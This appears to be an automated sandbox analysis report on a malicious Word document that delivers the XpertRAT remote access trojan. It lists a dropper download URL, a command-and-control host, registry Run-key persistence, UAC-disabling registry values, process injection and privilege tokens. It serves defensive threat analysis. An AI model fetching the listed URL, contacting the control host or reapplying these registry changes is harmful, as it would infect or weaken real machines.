xpertrat | 4a67cc05b5f45a774fafb1da0a0e8ac0f3839a0b520c0b2346bbeeace304aa77

Analysis

max time kernel
147s
max time network
149s
platform
windows7_x64
resource
win7-en-20210916
submitted
20-09-2021 11:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMG_Order PO 094765 SMH.doc
Size

241KB
MD5

09c275af1fe403ef1955cf691179cb33
SHA1

49b1427effc50d6949c45e22fecbbfba4b2380c5
SHA256

4a67cc05b5f45a774fafb1da0a0e8ac0f3839a0b520c0b2346bbeeace304aa77
SHA512

4e48d08153575ce1238591654f557cc410d36b04f9e9160d0d26f9db9e1e3cb5ec267654af9a97eaad544d0e43f9a5fe2b1b27bfc2ddc16ee2aec8efe00e05ef

Score

10^/10

xpertrat test evasion persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://esetnode32-antiviru.ydns.eu/EXCEL.exe

Extracted

Family

xpertrat

Version

3.0.10

Botnet

Test

kapasky-antivirus.firewall-gateway.net:4000

Mutex

L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1712	1632	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1160	1632	powershell.exe	WINWORD.EXE

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
XpertRAT
XpertRAT is a remote access trojan with various capabilities.
rat xpertrat

XpertRAT Core Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2432-112-0x0000000000400000-0x0000000000443000-memory.dmp	xpertrat
behavioral1/memory/2432-113-0x0000000000401364-mapping.dmp	xpertrat

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1712 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

EXCEL.exeEXCEL.exe

pid process

1612 EXCEL.exe
2372 EXCEL.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exeEXCEL.exe

pid process

1712 powershell.exe
1612 EXCEL.exe
Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

EXCEL.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" EXCEL.exe

flow	pid	process
7	1712	powershell.exe

pid	process
1612	EXCEL.exe
2372	EXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0"	EXCEL.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

EXCEL.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

EXCEL.exeEXCEL.exe

description	pid	process	target process
PID 1612 set thread context of 2372	1612	EXCEL.exe	EXCEL.exe
PID 2372 set thread context of 2416	2372	EXCEL.exe	iexplore.exe
PID 2372 set thread context of 2432	2372	EXCEL.exe	iexplore.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2375386074-2889020035-839874990-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1632 WINWORD.EXE

pid	process
1632	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exe

pid	process
1712	powershell.exe
1160	powershell.exe
1712	powershell.exe
1712	powershell.exe
1560	powershell.exe
956	powershell.exe
1972	powershell.exe
2172	powershell.exe
1612	EXCEL.exe
1612	EXCEL.exe
2372	EXCEL.exe
2372	EXCEL.exe
2372	EXCEL.exe
2372	EXCEL.exe
2372	EXCEL.exe
2372	EXCEL.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeIncreaseQuotaPrivilege	1560	powershell.exe
Token: SeSecurityPrivilege	1560	powershell.exe
Token: SeTakeOwnershipPrivilege	1560	powershell.exe
Token: SeLoadDriverPrivilege	1560	powershell.exe
Token: SeSystemProfilePrivilege	1560	powershell.exe
Token: SeSystemtimePrivilege	1560	powershell.exe
Token: SeProfSingleProcessPrivilege	1560	powershell.exe
Token: SeIncBasePriorityPrivilege	1560	powershell.exe
Token: SeCreatePagefilePrivilege	1560	powershell.exe
Token: SeBackupPrivilege	1560	powershell.exe
Token: SeRestorePrivilege	1560	powershell.exe
Token: SeShutdownPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeSystemEnvironmentPrivilege	1560	powershell.exe
Token: SeRemoteShutdownPrivilege	1560	powershell.exe
Token: SeUndockPrivilege	1560	powershell.exe
Token: SeManageVolumePrivilege	1560	powershell.exe
Token: 33	1560	powershell.exe
Token: 34	1560	powershell.exe
Token: 35	1560	powershell.exe
Token: SeIncreaseQuotaPrivilege	956	powershell.exe
Token: SeSecurityPrivilege	956	powershell.exe
Token: SeTakeOwnershipPrivilege	956	powershell.exe
Token: SeLoadDriverPrivilege	956	powershell.exe
Token: SeSystemProfilePrivilege	956	powershell.exe
Token: SeSystemtimePrivilege	956	powershell.exe
Token: SeProfSingleProcessPrivilege	956	powershell.exe
Token: SeIncBasePriorityPrivilege	956	powershell.exe
Token: SeCreatePagefilePrivilege	956	powershell.exe
Token: SeBackupPrivilege	956	powershell.exe
Token: SeRestorePrivilege	956	powershell.exe
Token: SeShutdownPrivilege	956	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeSystemEnvironmentPrivilege	956	powershell.exe
Token: SeRemoteShutdownPrivilege	956	powershell.exe
Token: SeUndockPrivilege	956	powershell.exe
Token: SeManageVolumePrivilege	956	powershell.exe
Token: 33	956	powershell.exe
Token: 34	956	powershell.exe
Token: 35	956	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	powershell.exe
Token: SeSecurityPrivilege	1972	powershell.exe
Token: SeTakeOwnershipPrivilege	1972	powershell.exe
Token: SeLoadDriverPrivilege	1972	powershell.exe
Token: SeSystemProfilePrivilege	1972	powershell.exe
Token: SeSystemtimePrivilege	1972	powershell.exe
Token: SeProfSingleProcessPrivilege	1972	powershell.exe
Token: SeIncBasePriorityPrivilege	1972	powershell.exe
Token: SeCreatePagefilePrivilege	1972	powershell.exe
Token: SeBackupPrivilege	1972	powershell.exe
Token: SeRestorePrivilege	1972	powershell.exe
Token: SeShutdownPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeSystemEnvironmentPrivilege	1972	powershell.exe
Token: SeRemoteShutdownPrivilege	1972	powershell.exe
Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXEEXCEL.exeiexplore.exe

pid process

1632 WINWORD.EXE
1632 WINWORD.EXE
1632 WINWORD.EXE
1632 WINWORD.EXE
2372 EXCEL.exe
2432 iexplore.exe

pid	process
1632	WINWORD.EXE
1632	WINWORD.EXE
1632	WINWORD.EXE
1632	WINWORD.EXE
2372	EXCEL.exe
2432	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exeEXCEL.exeEXCEL.exe

description	pid	process	target process
PID 1632 wrote to memory of 1712	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1712	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1712	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1712	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1160	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1160	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1160	1632	WINWORD.EXE	powershell.exe
PID 1632 wrote to memory of 1160	1632	WINWORD.EXE	powershell.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1712 wrote to memory of 1612	1712	powershell.exe	EXCEL.exe
PID 1612 wrote to memory of 1972	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1972	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1972	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1972	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1560	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1560	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1560	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 1560	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 956	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 956	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 956	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 956	1612	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 2064	1632	WINWORD.EXE	splwow64.exe
PID 1632 wrote to memory of 2064	1632	WINWORD.EXE	splwow64.exe
PID 1632 wrote to memory of 2064	1632	WINWORD.EXE	splwow64.exe
PID 1632 wrote to memory of 2064	1632	WINWORD.EXE	splwow64.exe
PID 1612 wrote to memory of 2172	1612	EXCEL.exe	powershell.exe
PID 1612 wrote to memory of 2172	1612	EXCEL.exe	powershell.exe
